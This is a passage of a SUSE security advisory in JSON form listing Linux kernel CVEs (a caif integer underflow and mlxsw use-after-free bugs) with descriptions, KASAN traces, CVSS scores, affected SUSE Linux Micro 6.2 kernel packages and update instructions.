"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68798"
},
{
"cve": "CVE-2025-68799",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68799"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncaif: fix integer underflow in cffrml_receive()\n\nThe cffrml_receive() function extracts a length field from the packet\nheader and, when FCS is disabled, subtracts 2 from this length without\nvalidating that len \u003e= 2.\n\nIf an attacker sends a malicious packet with a length field of 0 or 1\nto an interface with FCS disabled, the subtraction causes an integer\nunderflow.\n\nThis can lead to memory exhaustion and kernel instability, potential\ninformation disclosure if padding contains uninitialized kernel memory.\n\nFix this by validating that len \u003e= 2 before performing the subtraction.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68799",
"url": "https://www.suse.com/security/cve/CVE-2025-68799"
},
{
"category": "external",
"summary": "SUSE Bug 1256643 for CVE-2025-68799",
"url": "https://bugzilla.suse.com/1256643"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68799"
},
{
"cve": "CVE-2025-68800",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68800"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats\n\nCited commit added a dedicated mutex (instead of RTNL) to protect the\nmulticast route list, so that it will not change while the driver\nperiodically traverses it in order to update the kernel about multicast\nroute stats that were queried from the device.\n\nOne instance of list entry deletion (during route replace) was missed\nand it can result in a use-after-free [1].\n\nFix by acquiring the mutex before deleting the entry from the list and\nreleasing it afterwards.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\nRead of size 8 at addr ffff8881523c2fa8 by task kworker/2:5/22043\n\nCPU: 2 UID: 0 PID: 22043 Comm: kworker/2:5 Not tainted 6.18.0-rc1-custom-g1a3d6d7cd014 #1 PREEMPT(full)\nHardware name: Mellanox Technologies Ltd. MSN2010/SA002610, BIOS 5.6.5 08/24/2017\nWorkqueue: mlxsw_core mlxsw_sp_mr_stats_update [mlxsw_spectrum]\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xba/0x110\n print_report+0x174/0x4f5\n kasan_report+0xdf/0x110\n mlxsw_sp_mr_stats_update+0x4a5/0x540 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:1006 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n \u003c/TASK\u003e\n\nAllocated by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x8f/0xa0\n mlxsw_sp_mr_route_add+0xd8/0x4770 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30\n\nFreed by task 29933:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x70\n __kasan_slab_free+0x43/0x70\n kfree+0x14e/0x700\n mlxsw_sp_mr_route_add+0x2dea/0x4770 drivers/net/ethernet/mellanox/mlxsw/spectrum_mr.c:444 [mlxsw_spectrum]\n mlxsw_sp_router_fibmr_event_work+0x371/0xad0 drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c:7965 [mlxsw_spectrum]\n process_one_work+0x9cc/0x18e0\n worker_thread+0x5df/0xe40\n kthread+0x3b8/0x730\n ret_from_fork+0x3e9/0x560\n ret_from_fork_asm+0x1a/0x30",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68800",
"url": "https://www.suse.com/security/cve/CVE-2025-68800"
},
{
"category": "external",
"summary": "SUSE Bug 1256646 for CVE-2025-68800",
"url": "https://bugzilla.suse.com/1256646"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68800"
},
{
"cve": "CVE-2025-68801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68801"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_router: Fix neighbour use-after-free\n\nWe sometimes observe use-after-free when dereferencing a neighbour [1].\nThe problem seems to be that the driver stores a pointer to the\nneighbour, but without holding a reference on it. A reference is only\ntaken when the neighbour is used by a nexthop.\n\nFix by simplifying the reference counting scheme. Always take a\nreference when storing a neighbour pointer in a neighbour entry. Avoid\ntaking a referencing when the neighbour is used by a nexthop as the\nneighbour entry associated with the nexthop already holds a reference.\n\nTested by running the test that uncovered the problem over 300 times.\nWithout this patch the problem was reproduced after a handful of\niterations.\n\n[1]\nBUG: KASAN: slab-use-after-free in mlxsw_sp_neigh_entry_update+0x2d4/0x310\nRead of size 8 at addr ffff88817f8e3420 by task ip/3929\n\nCPU: 3 UID: 0 PID: 3929 Comm: ip Not tainted 6.18.0-rc4-virtme-g36b21a067510 #3 PREEMPT(full)\nHardware name: Nvidia SN5600/VMOD0013, BIOS 5.13 05/31/2023\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x6f/0xa0\n print_address_description.constprop.0+0x6e/0x300\n print_report+0xfc/0x1fb\n kasan_report+0xe4/0x110\n mlxsw_sp_neigh_entry_update+0x2d4/0x310\n mlxsw_sp_router_rif_gone_sync+0x35f/0x510\n mlxsw_sp_rif_destroy+0x1ea/0x730\n mlxsw_sp_inetaddr_port_vlan_event+0xa1/0x1b0\n __mlxsw_sp_inetaddr_lag_event+0xcc/0x130\n __mlxsw_sp_inetaddr_event+0xf5/0x3c0\n mlxsw_sp_router_netdevice_event+0x1015/0x1580\n notifier_call_chain+0xcc/0x150\n call_netdevice_notifiers_info+0x7e/0x100\n __netdev_upper_dev_unlink+0x10b/0x210\n netdev_upper_dev_unlink+0x79/0xa0\n vrf_del_slave+0x18/0x50\n do_set_master+0x146/0x7d0\n do_setlink.isra.0+0x9a0/0x2880\n rtnl_newlink+0x637/0xb20\n rtnetlink_rcv_msg+0x6fe/0xb90\n netlink_rcv_skb+0x123/0x380\n netlink_unicast+0x4a3/0x770\n netlink_sendmsg+0x75b/0xc90\n __sock_sendmsg+0xbe/0x160\n ____sys_sendmsg+0x5b2/0x7d0\n ___sys_sendmsg+0xfd/0x180\n __sys_sendmsg+0x124/0x1c0\n do_syscall_64+0xbb/0xfd0\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n[...]\n\nAllocated by task 109:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0x7b/0x90\n __kmalloc_noprof+0x2c1/0x790\n neigh_alloc+0x6af/0x8f0\n ___neigh_create+0x63/0xe90\n mlxsw_sp_nexthop_neigh_init+0x430/0x7e0\n mlxsw_sp_nexthop_type_init+0x212/0x960\n mlxsw_sp_nexthop6_group_info_init.constprop.0+0x81f/0x1280\n mlxsw_sp_nexthop6_group_get+0x392/0x6a0\n mlxsw_sp_fib6_entry_create+0x46a/0xfd0\n mlxsw_sp_router_fib6_replace+0x1ed/0x5f0\n mlxsw_sp_router_fib6_event_work+0x10a/0x2a0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nFreed by task 154:\n kasan_save_stack+0x30/0x50\n kasan_save_track+0x14/0x30\n __kasan_save_free_info+0x3b/0x60\n __kasan_slab_free+0x43/0x70\n kmem_cache_free_bulk.part.0+0x1eb/0x5e0\n kvfree_rcu_bulk+0x1f2/0x260\n kfree_rcu_work+0x130/0x1b0\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20\n\nLast potentially related work creation:\n kasan_save_stack+0x30/0x50\n kasan_record_aux_stack+0x8c/0xa0\n kvfree_call_rcu+0x93/0x5b0\n mlxsw_sp_router_neigh_event_work+0x67d/0x860\n process_one_work+0xd57/0x1390\n worker_thread+0x4d6/0xd40\n kthread+0x355/0x5b0\n ret_from_fork+0x1d4/0x270\n ret_from_fork_asm+0x11/0x20",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68801",
"url": "https://www.suse.com/security/cve/CVE-2025-68801"
},
{
"category": "external",
"summary": "SUSE Bug 1256653 for CVE-2025-68801",
"url": "https://bugzilla.suse.com/1256653"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
